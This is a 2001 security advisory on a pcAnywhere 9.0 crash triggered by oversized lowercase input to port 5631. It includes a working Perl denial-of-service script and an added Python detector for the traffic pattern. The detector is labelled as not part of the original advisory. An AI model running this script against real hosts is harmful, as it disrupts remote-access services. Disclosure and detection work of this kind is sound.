=============================================================================
Securax-SA-14            Security Advisory        belgian.networking.security Dutch
=============================================================================
Topic:      Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:  2001-02-08
Affects:    Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================

Note: This entire advisory has been based upon trial and error results. We
cannot ensure the information below is 100% correct, as we do not have any
source code to audit. This document is subject to change without prior
notice. If you happen to find more information / problems concerning the
problem below, or further variants, please contact me at the following email,
incubus@securax.net, or you can contact info@securax.org.

I. Problem Description
-----------------------

Symantec PcAnywhere is a program that will allow others (who are authorised
to have access :)) to use your pc. It's similar to a Windows NT 4.0 terminal
server. PcAnywhere (when it's configured to 'be a host pc') listens on two
ports: 5631 (pcanywheredata, according to nmap) and 65301 (pcanywhere). When
a user sends certain data in a particular way, pcAnywhere will crash.

When a large amount of data (it depends: sometimes the host will go down
with 320k characters, sometimes you will have to send 500k bytes) is sent to
a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, give
an error on the screen, and write "Unexpected program error" to a logfile
(with EAX, EBX, ... so read them, you'll find the yummy 0x61616161). Oh yeah,
don't use uppercase characters, as PcAnywhere won't crash on them.

Why no exploit, just a lame Denial of Service?
1.) because I suck in win32 debugging / overflowing (but I'm reading)
    /* so if I can overflow win32 progs, I'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..
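As an added example (not part of the original advisory), a small Python check a defender could run over reassembled client-to-host streams to flag the traffic pattern described above: a single connection to TCP/5631 carrying several hundred kilobytes that are almost entirely one repeated byte. The port number and the 320k lower bound come from the advisory; the 90% fill ratio, the function names and the sample flows are constructed assumptions, and the "normal session" bytes are made up rather than real pcAnywhere protocol data.

```python
from collections import Counter
from typing import Dict, Optional, Tuple

PCANYWHERE_DATA_PORT = 5631   # pcanywheredata port named in the advisory
MIN_CRASH_BYTES = 320_000     # smallest payload the advisory reports crashing AWHOST32.EXE
FILL_RATIO = 0.90             # assumed: share of one byte value that marks a filler flood


def dominant_byte(payload: bytes) -> Tuple[int, float]:
    """Return the most frequent byte value and the fraction of the payload it fills."""
    if not payload:
        return (0, 0.0)
    value, count = Counter(payload).most_common(1)[0]
    return (value, count / len(payload))


def classify_flow(dst_port: int, payload: bytes) -> Optional[str]:
    """Flag a client->host stream that matches the advisory's crash pattern.

    Returns a finding string, or None when the stream looks unremarkable.
    Large but varied streams (file transfer, screen data) are left alone.
    """
    if dst_port != PCANYWHERE_DATA_PORT or len(payload) < MIN_CRASH_BYTES:
        return None
    value, ratio = dominant_byte(payload)
    if ratio < FILL_RATIO:
        return None
    # The advisory says uppercase filler did not crash the host; report it anyway,
    # since the sender is still pushing an oversized buffer at the service.
    note = "lowercase filler, matches crashing case" if 0x61 <= value <= 0x7A else "non-lowercase filler"
    return f"pcAnywhere flood: {len(payload)} bytes, {ratio:.0%} 0x{value:02x} ({note})"


# Constructed sample streams (not captures from the advisory): (dst_port, payload)
SAMPLE_FLOWS = {
    "normal session": (5631, b"\x00\x01\x02\x03constructed-session-data" * 20),
    "advisory PoC":   (5631, b"a" * 500_000 + b"\n"),     # what the Perl script sends
    "uppercase":      (5631, b"A" * 400_000),
    "bulk transfer":  (5631, bytes(range(256)) * 2_000),  # 512,000 varied bytes
    "other port":     (80, b"a" * 500_000),
}


def scan(flows=SAMPLE_FLOWS) -> Dict[str, Optional[str]]:
    """Run the check over each sample flow; returns {name: finding or None}."""
    return {name: classify_flow(port, data) for name, (port, data) in flows.items()}


if __name__ == "__main__":
    for name, finding in scan().items():
        print(f"{name:15s} -> {finding or 'ok'}")
```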
The DoS code:

<--bof-->
#!/usr/bin/perl
# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
#            Zym0tic, segfault, #securax@irc.hexyn.be
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!

use IO::Socket;

$host = "$ARGV[0]";
$port = 5631;                 # pcanywheredata

if ($#ARGV<0) {
    print "use it like: $0 \n";
    exit();
}

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "damn, ";
print "hello\n";

# build a 500000-byte buffer of lowercase 'a' (0x61)
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
    $buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();
<--eof-->

II. Impact
----------

If someone exploits this, then Symantec is forced to rename this product to
PcAnyoneAnywhere or something... No, seriously, this could lead to a
compromise of a system.

III. Possible workarounds
-------------------------

This advisory was also sent to Symantec (info@symantec.com), we'll see what
they do with it...

IV. Credits
----------

love to Tessa.
greetz go out to: f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
and so many, many others I forgot...

=============================================================================
For more information   incubus@securax.org
Website                http://www.securax.org
Advisories/Text        http://www.securax.org/pers
-----------------------------------------------------------------------------